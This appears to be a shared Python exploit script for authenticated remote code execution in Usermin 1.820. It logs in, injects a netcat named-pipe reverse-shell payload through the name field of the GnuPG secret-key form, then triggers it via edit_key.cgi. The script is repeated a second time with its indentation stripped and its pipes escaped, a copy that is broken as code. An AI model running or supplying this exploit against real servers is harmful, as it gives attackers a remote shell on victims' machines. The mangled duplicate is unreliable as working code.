numanturle/usermin.py

## usermin.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
# author: twitter.com/numanturle
# usage: usermin.py [-h] -u HOST -l LOGIN -p PASSWORD
# https://youtu.be/wiRIWFAhz24


import argparse,requests,warnings,json,re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from cmd import Cmd

warnings.simplefilter('ignore',InsecureRequestWarning)

def init():
    parser = argparse.ArgumentParser(description='Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )')
    parser.add_argument('-u','--host',help='Host', type=str, required=True)
    parser.add_argument('-l', '--login',help='Username', type=str, required=True)
    parser.add_argument('-p', '--password',help='Password', type=str, required=True)
    args = parser.parse_args()
    exploit(args)

def exploit(args):

    listen_ip = "0.0.0.0"
    listen_port = 1337

    session = requests.Session()
    target = "https://{}:20000".format(args.host)
    username = args.login
    password = args.password

    print("[+] Target {}".format(target))

    headers = {
        'Cookie': 'redirect=1; testing=1;',
        'Referer': target
    }

    login = session.post(target+"/session_login.cgi", headers=headers, verify=False, data={"user":username,"pass":password})
    login_content = str(login.content)
    search = "webmin_search.cgi"
    check_login_string = re.findall(search,login_content)
    if check_login_string:
        session_hand_login = session.cookies.get_dict()

        print("[+] Login successfully")
        print("[+] Setup GnuPG")

        payload = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;".format(listen_ip,listen_port)
        #payload = "whoami;"
        post_data = {
            "name":'";{}echo "'.format(payload),
            "email":"1337@webmin.com",
        }

        print("[+] Payload {}".format(post_data))

        session.headers.update({'referer': target})

        create_secret = session.post(target+"/gnupg/secret.cgi", verify=False, data=post_data)
        create_secret_content = str(create_secret.content)

        search = "successfully"
        check_exp = re.findall(search,create_secret_content)

        if check_exp:

            print("[+] Setup successful")
            print("[+] Fetching key list")

            session.headers.update({'referer': target})
            key_list = session.post(target+"/gnupg/list_keys.cgi", verify=False)
            last_gets_key = re.findall("edit_key.cgi\?(.*?)'",str(key_list.content))[-2]
            print("[+] Key : {}".format(last_gets_key))

            session.headers.update({'referer': target})
            try:
                key_list = session.post(target+"/gnupg/edit_key.cgi?{}".format(last_gets_key), verify=False, timeout=3)
            except requests.exceptions.ReadTimeout:
                pass

            print("[+] 5ucc355fully_3xpl017")
        else:
            print("[-] an unexpected error occurred"  )


    else:
        print("[-] AUTH : Login failed.")

if __name__ == "__main__":
    init()
	#!/usr/bin/python3
	# -- coding: utf-8 --
	# Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
	# author: twitter.com/numanturle
	# usage: usermin.py [-h] -u HOST -l LOGIN -p PASSWORD
	# https://youtu.be/wiRIWFAhz24


	import argparse,requests,warnings,json,re
	from requests.packages.urllib3.exceptions import InsecureRequestWarning
	from cmd import Cmd

	warnings.simplefilter('ignore',InsecureRequestWarning)

	def init():
	parser = argparse.ArgumentParser(description='Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )')
	parser.add_argument('-u','--host',help='Host', type=str, required=True)
	parser.add_argument('-l', '--login',help='Username', type=str, required=True)
	parser.add_argument('-p', '--password',help='Password', type=str, required=True)
	args = parser.parse_args()
	exploit(args)

	def exploit(args):

	listen_ip = "0.0.0.0"
	listen_port = 1337

	session = requests.Session()
	target = "https://{}:20000".format(args.host)
	username = args.login
	password = args.password

	print("[+] Target {}".format(target))

	headers = {
	'Cookie': 'redirect=1; testing=1;',
	'Referer': target
	}

	login = session.post(target+"/session_login.cgi", headers=headers, verify=False, data={"user":username,"pass":password})
	login_content = str(login.content)
	search = "webmin_search.cgi"
	check_login_string = re.findall(search,login_content)
	if check_login_string:
	session_hand_login = session.cookies.get_dict()

	print("[+] Login successfully")
	print("[+] Setup GnuPG")

	payload = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/sh -i 2>&1\|nc {} {} >/tmp/f;".format(listen_ip,listen_port)
	#payload = "whoami;"
	post_data = {
	"name":'";{}echo "'.format(payload),
	"email":"1337@webmin.com",
	}

	print("[+] Payload {}".format(post_data))

	session.headers.update({'referer': target})

	create_secret = session.post(target+"/gnupg/secret.cgi", verify=False, data=post_data)
	create_secret_content = str(create_secret.content)

	search = "successfully"
	check_exp = re.findall(search,create_secret_content)

	if check_exp:

	print("[+] Setup successful")
	print("[+] Fetching key list")

	session.headers.update({'referer': target})
	key_list = session.post(target+"/gnupg/list_keys.cgi", verify=False)
	last_gets_key = re.findall("edit_key.cgi\?(.*?)'",str(key_list.content))[-2]
	print("[+] Key : {}".format(last_gets_key))

	session.headers.update({'referer': target})
	try:
	key_list = session.post(target+"/gnupg/edit_key.cgi?{}".format(last_gets_key), verify=False, timeout=3)
	except requests.exceptions.ReadTimeout:
	pass

	print("[+] 5ucc355fully_3xpl017")
	else:
	print("[-] an unexpected error occurred" )




	else:
	print("[-] AUTH : Login failed.")

	if __name__ == "__main__":
	init()